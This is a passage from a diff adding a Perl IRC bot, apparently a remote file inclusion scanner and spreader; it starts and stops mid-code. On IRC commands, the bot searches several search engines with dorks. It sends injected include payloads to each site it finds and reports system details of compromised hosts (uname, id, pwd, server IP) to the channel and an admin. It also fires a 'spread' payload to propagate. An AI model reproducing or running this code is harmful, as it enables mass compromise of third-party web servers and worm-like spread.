Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4] Server Name $name1"); + display( $dsp,"PRIVMSG $chanres :4[12G4o4o12g9l4e4] Safe Mode ON: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :!google\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + + my @google = &googlet($dork); + push( my @tot, @google ); + my @puliti = &unici(@tot); + display( $dsp,"PRIVMSG $channel :7[3ScaN7] 12G4o4o12g9l4e PASS 12[]8[]4[] ".scalar(@tot)."3 for exploited.... 4".scalar(@puliti)."3 => 4$dork"); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp,"PRIVMSG $channel :7[3ScaN7] 12G4o8o12g9l4e PASS FINISHED 7for 4$dork 12[]8[]4[]"); } + my $test = "http://".$site.$bug.$id."?"; + my $print = "http://".$site.$bug.$printcmd."?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Result..."); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Uptime: $up"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Uname -a: $un"); + display( $dsp,"PRIVMSG $admin :4[12G4o4o12g9l4e4 PASS] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Id: $id1"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Pwd: $pwd1"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Server Name: $name1"); + display( $dsp,"PRIVMSG $admin :4[12G4o4o12g9l4e4 PASS] Safe: $print"); + display( $dsp,"PRIVMSG $chanres :4[12G4o4o12g9l4e4 PASS] Safe Mode OFF: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /princeteam1979/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Result..."); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Safe Mode ON: $print"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[12G4o4o12g9l4e4 PASS] Server Name $name1"); + display( $dsp,"PRIVMSG $chanres :4[12G4o4o12g9l4e4 PASS] Safe Mode ON: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @alltheweb = &alltheweb($dork); + push( my @tot, @alltheweb ); + my @puliti = &unici(@tot); + display( $dsp,"PRIVMSG $channel :7[3$channel7] 12A7l8l3THE12W9e4B 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 => 4$dork"); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp,"PRIVMSG $channel :7[3$channel7] 12A7l8l3THE12W9e4B 4FINISHED 7for 4$dork 12[]8[]4[]"); + } + my $test = "http://".$site.$bug.$id."?"; + my $print = "http://".$site.$bug.$pritcmd."?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Result..."); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Uptime: $up"); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Uname -a: $un"); + display( $dsp,"PRIVMSG $admin :4[12A7l8l3THE12W9e4B] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Id: $id1"); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Pwd: $pwd1"); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Server Name: $name1"); + display( $dsp,"PRIVMSG $admin :4[12A7l8l3THE12W9e4B] Safe: $print"); + display( $dsp,"PRIVMSG $chanres :4[12A7l8l3THE12W9e4B] Safe Mode OFF: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /princeteam1979/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Result..."); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Safe Mode ON: $print"); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[12A7l8l3THE12W9e4B] Server Name $name1"); + display( $dsp,"PRIVMSG $chanres :4[12A7l8l3THE12W9e4B] Safe Mode ON: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @uol = &uolsub($dork); + push( my @tot, @uol ); + my @puliti = &unici(@tot); + display( $dsp,"PRIVMSG $channel :7[3$channel7] 7U3O7L 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 => 4$dork"); + my $uni = scalar(@puliti); + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp,"PRIVMSG $channel :7[3$channel7] 7U3O7L 4FINISHED 7for 4$dork 12[]8[]4[]"); + } + my $test = "http://".$site.$bug.$id."?"; + my $print = "http://".$site.$bug.$printcmd."?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Result..."); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Uptime: $up"); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Uname -a: $un"); + display( $dsp,"PRIVMSG $admin :4[7U3O7L4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Id: $id1"); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Pwd: $pwd1"); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Server Name: $name1"); + display( $dsp,"PRIVMSG $admin :4[7U3O7L4] Safe: $print"); + display( $dsp,"PRIVMSG $chanres :4[7U3O7L4] Safe Mode OFF: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /princeteam1979/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Result..."); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Safe Mode ON: $print"); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[7U3O7L4] Server Name $name1"); + display( $dsp,"PRIVMSG $chanres :4[7U3O7L4] Safe Mode ON: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @altavista = &altavista($dork); + push( my @tot, @allist, @alldeist, @allistus ); + my @puliti = &unici(@tot); + display( $dsp,"PRIVMSG $channel :7[3$channel7] 7Al13tav3ista 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 => 4$dork"); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp,"PRIVMSG $channel :7[3$channel7] 7Al13tav3ista 4FINISHED 7for 4$dork 12[]8[]4[]"); + } + my $test = "http://".$site.$bug.$id."?"; + my $print = "http://".$site.$bug.$printcmd."?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Result..."); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Uptime: $up"); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Uname -a: $un"); + display( $dsp,"PRIVMSG $admin :4[7Al13tav3ista4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Id: $id1"); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Pwd: $pwd1"); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Server Name: $name1"); + display( $dsp,"PRIVMSG $admin :4[7Al13tav3ista4] Safe: $print"); + display( $dsp,"PRIVMSG $chanres :4[7Al13tav3ista4] Safe Mode OFF: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /princeteam1979/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Result..."); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Safe Mode ON: $print"); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[7Al13tav3ista4] Server Name $name1"); + display( $dsp,"PRIVMSG $chanres :4[7Al13tav3ista4] Safe Mode ON: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @searchlist = &search($dork); + my @search2 = &searchs($dork); + push( my @tot, @searchlist, @search2 ); + my @puliti = &unici(@tot); + display( $dsp,"PRIVMSG $channel :7[3$channel7] 4S6E7A12R4C3H 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 => 4$dork"); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp,"PRIVMSG $channel :7[3$channel7] 4S6E7A12R4C3H 4FINISHED 7for 4$dork 12[]8[]4[]"); + } + my $test = "http://".$site.$bug.$id."?"; + my $print = "http://".$site.$bug.$printcmd."?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Result..."); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Uptime: $up"); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Uname -a: $un"); + display( $dsp,"PRIVMSG $admin :4[4S6E7A12R4C3H4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Id: $id1"); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Pwd: $pwd1"); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Server Name: $name1"); + display( $dsp,"PRIVMSG $admin :4[4S6E7A12R4C3H4] Safe: $print"); + display( $dsp,"PRIVMSG $chanres :4[4S6E7A12R4C3H4] Safe Mode OFF: $print"); + my $test2 ="http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /princeteam1979/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Result..."); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Safe Mode ON: $print"); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[4S6E7A12R4C3H4] Server Name $name1"); + display( $dsp,"PRIVMSG $chanres :4[4S6E7A12R4C3H4] Safe Mode ON: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @mlist = &msn($dork); + push( my @tot, @mlist ); + my @puliti = &unici(@tot); + display( $dsp,"PRIVMSG $channel :7[3$channel7] 7M4S7N 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 => 4$dork"); + my $uni = scalar(@puliti); + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp,"PRIVMSG $channel :7[3$channel7] 7M4S7N 4FINISHED 7for 4$dork 12[]8[]4[]"); + } + my $test = "http://".$site.$bug.$id."?"; + my $print = "http://".$site.$bug.$printcmd."?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Result..."); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Uptime: $up"); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Uname -a: $un"); + display( $dsp,"PRIVMSG $admin :4[7M4S7N4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Id: $id1"); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Pwd: $pwd1"); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Server Name: $name1"); + display( $dsp,"PRIVMSG $admin :4[7M4S7N4] Safe: $print"); + display( $dsp,"PRIVMSG $chanres :4[7M4S7N4] Safe Mode OFF: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /princeteam1979/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Result..."); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Safe Mode ON: $print"); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[7M4S7N4] Server Name $name1"); + display( $dsp,"PRIVMSG $chanres :4[7M4S7N4] Safe Mode ON: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @asklist = &ask($dork); + push( my @tot, @asklist ); + my @puliti = &unici(@tot); + display( $dsp,"PRIVMSG $channel :7[3$channel7] 14A4S14K 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 => 4$dork"); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp,"PRIVMSG $channel :7[3$channel7] 14A4S14K 4FINISHED 7for 4$dork 12[]8[]4[]"); + } + my $test = "http://".$site.$bug.$id."?"; + my $print = "http://".$site.$bug.$printcmd."?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Result..."); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Uptime: $up"); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Uname -a: $un"); + display( $dsp,"PRIVMSG $admin :4[14A4S14K4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Id: $id1"); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Pwd: $pwd1"); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Server Name: $name1"); + display( $dsp,"PRIVMSG $admin :4[14A4S14K4] Safe: $print"); + display( $dsp,"PRIVMSG $chanres :4[14A4S14K4] Safe Mode OFF: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /princeteam1979/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Result..."); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Safe Mode ON: $print"); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[14A4S14K4] Server Name $name1"); + display( $dsp,"PRIVMSG $chanres :4[14A4S14K4] Safe Mode ON: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @fireball = fireball($dork); + push( my @tot, @fireball ); + my @puliti = &unici(@tot); + display( $dsp,"PRIVMSG $channel :7[3$channel7] 4F3i6r7e4B7a12ll 12[]8[]4[] ".scalar(@tot)."3 for exploited... 4 ".scalar(@puliti)."3 => 4$dork"); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp,"PRIVMSG $channel :7[3$channel7] 4F3i6r7e4B7a12ll 4FINISHED 7for 4$dork 12[]8[]4[]"); + } + my $test = "http://".$site.$bug.$id."?"; + my $print = "http://".$site.$bug.$printcmd."?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /princeteam1979/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Result..."); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Uptime: $up"); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Uname -a: $un"); + display( $dsp,"PRIVMSG $admin :4[4F3i6r7e4B7a12ll4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Id: $id1"); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Pwd: $pwd1"); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Server Name: $name1"); + display( $dsp,"PRIVMSG $admin :4[4F3i6r7e4B7a12ll4] Safe: $print"); + display( $dsp,"PRIVMSG $chanres :4[4F3i6r7e4B7a12ll4] Safe Mode OFF: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /princeteam1979/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Result..."); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Safe Mode ON: $print"); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Uname -a: $un"); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Server Ip: $ip1"); + display( $dsp,"PRIVMSG $channel :4[4F3i6r7e4B7a12ll4] Server Name $name1"); + display( $dsp,"PRIVMSG $chanres :4[4F3i6r7e4B7a12ll4] Safe Mode ON: $print"); + my $test2 ="http://".$site.$bug.$spread."?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + + } + } + } + } + } + exit; + } + } +} + +sub display() { + if ( $#_ == '1' ) { + my $dsp = $_[0]; + print $dsp "$_[1]\n"; + } + else { + print $dsp "$_[0]\n"; + } +} + +sub os() { + my $site = $_[0]; + my $Res = query($site); + + while ( $Res =~ m/<br>uname -a:(.+?)\<br>/g ) { + $un = $1; + } + while ( $Res =~ m/<br>uptime:(.+?)\<br>/g ) { + $up = $1; + } + while ( $Res =~ m/<br>id:(.+?)\<br>/g ) { + $id1 = $1; + } + while ( $Res =~ m/<br>pwd:(.+?)\<br>/g ) { + $pwd1 = $1; + } + while ( $Res =~ m/<br>php:(.+?)\<br>/g ) { + $php1 = $1; + } + while ( $Res =~ m/<br>software:(.+?)\<br>/g ) { + $sof1 = $1; + } + while ( $Res =~ m/<br>server-ip:(.+?)\<br>/g ) { + $ip1 = $1; + } + while ( $Res =~ m/<br>server-name:(.+?)\<br>/g ) { + $name1 = $1; + } + while ( $Res =~ m/<br>os:(.+?)\<br>/g ) { + $os = $1; + } + while ( $Res =~ m/<br>free:(.+?)\<br>/g ) { + $free = $1; + } + while ( $Res =~ m/<br>used:(.+?)\<br>/g ) { + $used = $1; + } + while ( $Res =~ m/<br>total:(.+?)\<br>/g ) { + $all = $1; + } +} + +sub googlet { + my @dominios = ( + "ae", "com.ar", "at", "com.au", "be", "com.br", + "ca", "ch", "cl", "de", "dk" + ); + my @country = + ( "AE", "AR", "AT", "AU", "BE", "BR", "CA", "CH", "CL", "DE", "DK" ); + my @lst; + my $key = key( $_[0] ); + my $c = 0; + foreach my $i (@dominios) { + my @lista = google( $i, $key, $country[$c] ); + push( @lst, @lista ); + $c++; + } + return @lst; +} + +sub google() { + my @lst; + my $i = $_[0]; + my $key = $_[1]; + my $country = $_[2]; + for ( $b = 0 ; $b <= 100 ; $b += 100 ) { + my $Go = + ( "www.google." . $i + . "/search?hl=en&q=" + . key($key) + . "&num=100&start=" + . $b + . "&meta=cr%3Dcountry" + . $country ); + my $Res = query($Go); + while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) { + if ( $1 !~ /google/ ) { + my $k = $1; + my @grep = links($k); + push( @lst, @grep ); + } + } + } + return @lst; +} + + +sub alltheweb() { + my @lst; + my $key = $_[0]; + my $i = 0; + my $pg = 0; + for ( $i = 0 ; $i <= 1000 ; $i += 100 ) { + my $all = + ( "http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=" + . key($key) . "&o=" + . $i ); + my $Res = query($all); + while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) { + my $k = $1; + $k =~ s/ //g; + my @grep = links($k); + push( @lst, @grep ); + } + } + return @lst; +} + +sub altavista() { + my @lst; + my $key = $_[0]; + for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { + my $AlT = + ( 